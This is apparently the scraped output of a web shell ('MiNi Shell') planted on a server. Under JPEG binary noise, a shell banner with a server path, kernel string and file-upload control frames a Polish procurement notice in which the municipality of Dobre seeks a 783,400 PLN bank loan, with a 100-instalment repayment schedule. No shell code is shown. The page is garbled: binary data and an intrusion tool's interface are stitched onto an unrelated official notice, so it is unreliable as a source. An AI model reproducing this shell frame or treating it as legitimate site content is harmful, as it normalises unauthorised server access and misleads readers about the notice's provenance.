JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140807/263628-N-2014.html

<p class="kh_header"><b>Dobre: Udzielenie i obsługa długoterminowego kredytu w wysokości 783 400,00 zł. PLN.- GKI 271.9.2014</b><br>
<b>Numer ogłoszenia: 263628 - 2014; data zamieszczenia: 07.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobre , ul. Tadeusza Kościuszki 1, 05-307 Dobre, woj. mazowieckie, tel. 25 7571190, faks 25 7571190.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminadobre.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie i obsługa długoterminowego kredytu w wysokości 783 400,00 zł. PLN.- GKI 271.9.2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest udzielenie i obsługa długoterminowego kredytu w wysokości 783 400,00 zł. PLN (słownie: siedemset osiemdziesiąt trzy tysiące czterysta  złotych)  na spłatę wcześniej zaciągniętych zobowiązań z tytułu kredytów i pożyczek o których mowa w art. 89 ust. 1 pkt. 3 ustawy z dnia 27 sierpnia 2009r. o finansach publicznych (j.t. Dz. U. z 2013 r. poz. 885 z późn. zm.).

2.	Charakterystyka kredytu określonego w ust. 1:

1) okres kredytowania ustala się na lata 2014 - 2024,
2) okres karencji w spłacie rat do 31.08.2016 r. 
3) realizacja kredytu w następujących transzach i terminach w formie przelewu środków pieniężnych na rachunek budżetu Gminy Dobre:
-  I transza 783 400,00 zł. od dnia 1 września 2014 r.
4) spłata rat kapitałowych następować będzie miesięcznie według harmonogramu po okresie karencji :
 1  rata do dnia  30.09.2016 r. w kwocie	3 400,00 zł.	do kwoty	780 000,00 zł.
 2  rata do dnia  31.10.2016 r. w kwocie	3 200,00 zł.	do kwoty	776 800,00 zł.
 3  rata do dnia  30.11.2016 r. w kwocie	3 200,00 zł.	do kwoty	773 600,00 zł.
 4  rata do dnia  31.12.2016 r. w kwocie	3 200,00 zł.	do kwoty	770 400,00 zł.
 
 5  rata do dnia  31.01.2017 r. w kwocie	3 500,00 zł.	do kwoty	766 900,00 zł.
 6  rata do dnia  28.02.2017 r. w kwocie	3 500,00 zł.	do kwoty	763 400,00 zł.
 7  rata do dnia  31.03.2017 r. w kwocie	3 500,00 zł.	do kwoty	759 900,00 zł.
 8  rata do dnia  30.04.2017 r. w kwocie	3 500,00 zł.	do kwoty	756 400,00 zł.
 9  rata do dnia  31.05.2017 r. w kwocie	3 500,00 zł.	do kwoty	752 900,00 zł.
10 rata do dnia  30.06.2017 r. w kwocie	3 500,00 zł.	do kwoty	749 400,00 zł.
11 rata do dnia  31.07.2017 r. w kwocie	3 500,00 zł.	do kwoty	745 900,00 zł.
12 rata do dnia  31.08.2017 r. w kwocie	3 500,00 zł.	do kwoty	742 400,00 zł.
13 rata do dnia  30.09.2017 r. w kwocie	3 500,00 zł.	do kwoty	738 900,00 zł.
14 rata do dnia  31.10.2017 r. w kwocie	3 500,00 zł.	do kwoty	735 400,00 zł.
15 rata do dnia  30.11.2017 r. w kwocie	3 500,00 zł.	do kwoty	731 900,00 zł.
16 rata do dnia  31.12.2017 r. w kwocie	3 500,00 zł.	do kwoty	728 400,00 zł.

17  rata do dnia  31.01.2018 r. w kwocie	3 500,00 zł.	do kwoty	724 900,00 zł.
18  rata do dnia  28.02.2018 r. w kwocie	3 500,00 zł.	do kwoty	721 400,00 zł.
19  rata do dnia  31.03.2018 r. w kwocie	3 500,00 zł.	do kwoty	717 900,00 zł.
20  rata do dnia  30.04.2018 r. w kwocie	3 500,00 zł.	do kwoty	714 400,00 zł.
21  rata do dnia  31.05.2018 r. w kwocie	3 500,00 zł.	do kwoty	710 900,00 zł.
22  rata do dnia  30.06.2018 r. w kwocie	3 500,00 zł.	do kwoty	707 400,00 zł.
23  rata do dnia  31.07.2018 r. w kwocie	3 500,00 zł.	do kwoty	703 900,00 zł.
24  rata do dnia  31.08.2018 r. w kwocie	3 500,00 zł.	do kwoty	700 400,00 zł.
25  rata do dnia  30.09.2018 r. w kwocie	3 500,00 zł.	do kwoty	696 900,00 zł.
26  rata do dnia  31.10.2018 r. w kwocie	3 500,00 zł.	do kwoty	693 400,00 zł.
27  rata do dnia  30.11.2018 r. w kwocie	3 500,00 zł.	do kwoty	689 900,00 zł.
28  rata do dnia  31.12.2018 r. w kwocie	3 500,00 zł.	do kwoty	686 400,00 zł.
29  rata do dnia  31.01.2019 r. w kwocie	3 500,00 zł.	do kwoty	682 900,00 zł.
30  rata do dnia  28.02.2019 r. w kwocie	3 500,00 zł.	do kwoty	679 400,00 zł.
31  rata do dnia  31.03.2019 r. w kwocie	3 500,00 zł.	do kwoty	675 900,00 zł.
32  rata do dnia  30.04.2019 r. w kwocie	3 500,00 zł.	do kwoty	672 400,00 zł.
33  rata do dnia  31.05.2019 r. w kwocie	3 500,00 zł.	do kwoty	668 900,00 zł.
34  rata do dnia  30.06.2019 r. w kwocie	3 500,00 zł.	do kwoty	665 400,00 zł.
35  rata do dnia  31.07.2019 r. w kwocie	3 500,00 zł.	do kwoty	661 900,00 zł.
36  rata do dnia  31.08.2019 r. w kwocie	3 500,00 zł.	do kwoty	658 400,00 zł.
37  rata do dnia  30.09.2019 r. w kwocie	3 500,00 zł.	do kwoty	654 900,00 zł.
38  rata do dnia  31.10.2019 r. w kwocie	3 500,00 zł.	do kwoty	651 400,00 zł.
39  rata do dnia  30.11.2019 r. w kwocie	3 500,00 zł.	do kwoty	647 900,00 zł.
40  rata do dnia  31.12.2019 r. w kwocie	3 500,00 zł.	do kwoty	644 400,00 zł.
41  rata do dnia  31.01.2020 r. w kwocie	3 500,00 zł.	do kwoty	640 900,00 zł.
42  rata do dnia  29.02.2020 r. w kwocie	3 500,00 zł.	do kwoty	637 400,00 zł.
43  rata do dnia  31.03.2020 r. w kwocie	3 500,00 zł.	do kwoty	633 900,00 zł.
44  rata do dnia  30.04.2020 r. w kwocie	3 500,00 zł.	do kwoty	630 400,00 zł.
45  rata do dnia  31.05.2020 r. w kwocie	3 500,00 zł.	do kwoty	626 900,00 zł.
46  rata do dnia  30.06.2020 r. w kwocie	3 500,00 zł.	do kwoty	623 400,00 zł.
47  rata do dnia  31.07.2020 r. w kwocie	3 500,00 zł.	do kwoty	619 900,00 zł.
48  rata do dnia  31.08.2020 r. w kwocie	3 500,00 zł.	do kwoty	616 400,00 zł.
49  rata do dnia  30.09.2020 r. w kwocie	3 500,00 zł.	do kwoty	612 900,00 zł.
50  rata do dnia  31.10.2020 r. w kwocie	3 500,00 zł.	do kwoty	609 400,00 zł.
51  rata do dnia  30.11.2020 r. w kwocie	3 500,00 zł.	do kwoty	605 900,00 zł.
52  rata do dnia  31.12.2020 r. w kwocie	3 500,00 zł.	do kwoty	602 400,00 zł.
53  rata do dnia  31.01.2021 r. w kwocie    12 550,00 zł.	do kwoty	589 850,00 zł.
54  rata do dnia  29.02.2021 r. w kwocie    12 550,00 zł.	do kwoty	577 300,00 zł.
55  rata do dnia  31.03.2021 r. w kwocie    12 550,00 zł.	do kwoty	564 750,00 zł.
56  rata do dnia  30.04.2021 r. w kwocie    12 550,00 zł.	do kwoty	552 200,00 zł.
57  rata do dnia  31.05.2021 r. w kwocie    12 550,00 zł.	do kwoty	539 650,00 zł.
58  rata do dnia  30.06.2021 r. w kwocie    12 550,00 zł.	do kwoty	527 100,00 zł.
59  rata do dnia  31.07.2021 r. w kwocie    12 550,00 zł.	do kwoty	514 550,00 zł.
60  rata do dnia  31.08.2021 r. w kwocie    12 550,00 zł.	do kwoty	502 000,00 zł.
61  rata do dnia  30.09.2021 r. w kwocie    12 550,00 zł.	do kwoty	489 450,00 zł.
62  rata do dnia  31.10.2021 r. w kwocie    12 550,00 zł.	do kwoty	476 900,00 zł.
63  rata do dnia  30.11.2021 r. w kwocie    12 550,00 zł.	do kwoty	464 350,00 zł.
64  rata do dnia  31.12.2021 r. w kwocie    12 550,00 zł.	do kwoty	451 800,00 zł.
65  rata do dnia  31.01.2022 r. w kwocie    12 550,00 zł.	do kwoty	439 250,00 zł.
66  rata do dnia  28.02.2022 r. w kwocie    12 550,00 zł.	do kwoty	426 700,00 zł.
67  rata do dnia  31.03.2022 r. w kwocie    12 550,00 zł.	do kwoty	414 150,00 zł.
68  rata do dnia  30.04.2022 r. w kwocie    12 550,00 zł.	do kwoty	401 600,00 zł.
69  rata do dnia  31.05.2022 r. w kwocie    12 550,00 zł.	do kwoty	389 050,00 zł.
70  rata do dnia  30.06.2022 r. w kwocie    12 550,00 zł.	do kwoty	376 500,00 zł.
71  rata do dnia  31.07.2022 r. w kwocie    12 550,00 zł.	do kwoty	363 950,00 zł.
72  rata do dnia  31.08.2022 r. w kwocie    12 550,00 zł.	do kwoty	351 400,00 zł.
73  rata do dnia  30.09.2022 r. w kwocie    12 550,00 zł.	do kwoty	338 850,00 zł.
74  rata do dnia  31.10.2022 r. w kwocie    12 550,00 zł.	do kwoty	326 300,00 zł.
75  rata do dnia  30.11.2022 r. w kwocie    12 550,00 zł.	do kwoty	313 750,00 zł.
76  rata do dnia  31.12.2022 r. w kwocie    12 550,00 zł.	do kwoty	301 200,00 zł.
77  rata do dnia  31.01.2023 r. w kwocie    12 550,00 zł.	do kwoty	288 650,00 zł.
78  rata do dnia  28.02.2023 r. w kwocie    12 550,00 zł.	do kwoty	276 100,00 zł.
79  rata do dnia  31.03.2023 r. w kwocie    12 550,00 zł.	do kwoty	263 550,00 zł.
80  rata do dnia  30.04.2023 r. w kwocie    12 550,00 zł.	do kwoty	251 000,00 zł.
81  rata do dnia  31.05.2023 r. w kwocie    12 550,00 zł.	do kwoty	238 450,00 zł.
82  rata do dnia  30.06.2023 r. w kwocie    12 550,00 zł.	do kwoty	225 900,00 zł.
83  rata do dnia  31.07.2023 r. w kwocie    12 550,00 zł.	do kwoty	213 350,00 zł.
84  rata do dnia  31.08.2023 r. w kwocie    12 550,00 zł.	do kwoty	200 800,00 zł.
85  rata do dnia  30.09.2023 r. w kwocie    12 550,00 zł.	do kwoty	188 250,00 zł.
86  rata do dnia  31.10.2023 r. w kwocie    12 550,00 zł.	do kwoty	175 700,00 zł.
87  rata do dnia  30.11.2023 r. w kwocie    12 550,00 zł.	do kwoty	163 150,00 zł.
88  rata do dnia  31.12.2023 r. w kwocie    12 550,00 zł.	do kwoty	150 600,00 zł.
89  rata do dnia  31.01.2024 r. w kwocie    12 550,00 zł.	do kwoty	138 050,00 zł.
90  rata do dnia  28.02.2024 r. w kwocie    12 550,00 zł.	do kwoty	125 500,00 zł.
91  rata do dnia  31.03.2024 r. w kwocie    12 550,00 zł.	do kwoty	112 950,00 zł.
92  rata do dnia  30.04.2024 r. w kwocie    12 550,00 zł.	do kwoty	100 400,00 zł.
93  rata do dnia  31.05.2024 r. w kwocie    12 550,00 zł.	do kwoty	  87 850,00 zł.
94  rata do dnia  30.06.2024 r. w kwocie    12 550,00 zł.	do kwoty	  75 300,00 zł.
95  rata do dnia  31.07.2024 r. w kwocie    12 550,00 zł.	do kwoty	  62 750,00 zł.
96  rata do dnia  31.08.2024 r. w kwocie    12 550,00 zł.	do kwoty	  50 200,00 zł.
97  rata do dnia  30.09.2024 r. w kwocie    12 550,00 zł.	do kwoty	  37 650,00 zł.
98  rata do dnia  31.10.2024 r. w kwocie    12 550,00 zł.	do kwoty	  25 100,00 zł.
99  rata do dnia  30.11.2024 r. w kwocie    12 550,00 zł.	do kwoty	  12 550,00 zł.
          100  rata do dnia 31.12.2024 r.  w kwocie    12 550,00 zł.	do kwoty	           0,00 zł.
	  
5) spłata odsetek następować będzie w okresach miesięcznych na podstawie zawiadomienia z banku o wysokości naliczonych odsetek w terminie 5 dni przed datą płatności. Termin rozpoczęcia spłaty odsetek ustala się na dzień   30.09. 2014 r. 
6) płatność rat i odsetek będzie realizowana w ostatnim dniu danego miesiąca z tym, że jeśli będzie to dzień wolny od pracy ,to płatność nastąpi w dniu roboczym   poprzedzającym ten dzień, 
7) oprocentowanie kredytu oparte o zmienną stawkę WIBOR 1 M ogłaszanej  dla ostatniego dnia roboczego miesiąca poprzedzającego okres obrachunkowy, skorygowanej o marżę banku.  
8) dzień podpisania umowy będzie dniem postawienia kredytu do dyspozycji zamawiającego w terminach i transzach dostosowanych do potrzeb zamawiającego, 
9) kredyt nie będzie obciążony innymi opłatami niż wymienione w SIWZ.
10) kredytobiorcy będzie przysługiwać prawo do wcześniejszej spłaty kredytu bez dodatkowych kosztów.
11) wartość wszystkich prowizji od udzielonego kredytu wyniesie  0%.
12) zabezpieczeniem spłaty kredytu będzie weksel własny in blanco wraz z deklaracją wekslową.
Dla celów przygotowania wyceny oferty, Wykonawcy uczestniczący w niniejszym postępowaniu przyjmą stawkę WIBOR 1M z dnia 31.07.2014 r. tj. 2,60 %  oraz stałą marżę banku w całym okresie kredytowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2024.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten zostanie spełniony, jeśli  Wykonawca wykaże, że posiada  aktualne  uprawnienia  do wykonywania czynności bankowych wymagane ustawą  z dnia 29 sierpnia 1997 roku  Prawo bankowe ( tekst jednolity Dz. U. 2002 r. Nr 72  poz.665 z póź. zm).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, że przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z wymienionych poniżej okoliczności, z uwzględnieniem podanych warunków do ich wprowadzenia:
1)	Zamawiający zastrzega sobie prawo do złożenia oświadczenia o rezygnacji z części wykorzystania kredytu bez ponoszenia dodatkowych opłat, w przypadku poprawy sytuacji finansowej kredytobiorcy. W takim przypadku wykonawca nie będzie pobierał żadnych innych opłat od niewykorzystanej części kredytu;
2)	Kredytobiorca zastrzega sobie możliwość wcześniejszej spłaty całości lub części kredytu bez ponoszenia dodatkowych  prowizji i opłat, w przypadku poprawy sytuacji  finansowej kredytobiorcy;
3)	 zmianie mogą ulec ilości, terminy oraz wysokości transz w zależności od sytuacji finansowej kredytobiorcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminadobre.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego w sekretariacie , pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2014 godzina 12:00, miejsce: w siedzibie Zamawiającego w sekretariacie , pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com